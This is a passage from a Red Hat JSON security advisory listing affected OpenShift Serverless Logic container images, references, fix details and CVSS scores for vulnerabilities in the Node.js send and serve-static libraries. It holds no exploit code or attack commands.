"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-14T00:59:58+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-14T00:59:58+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
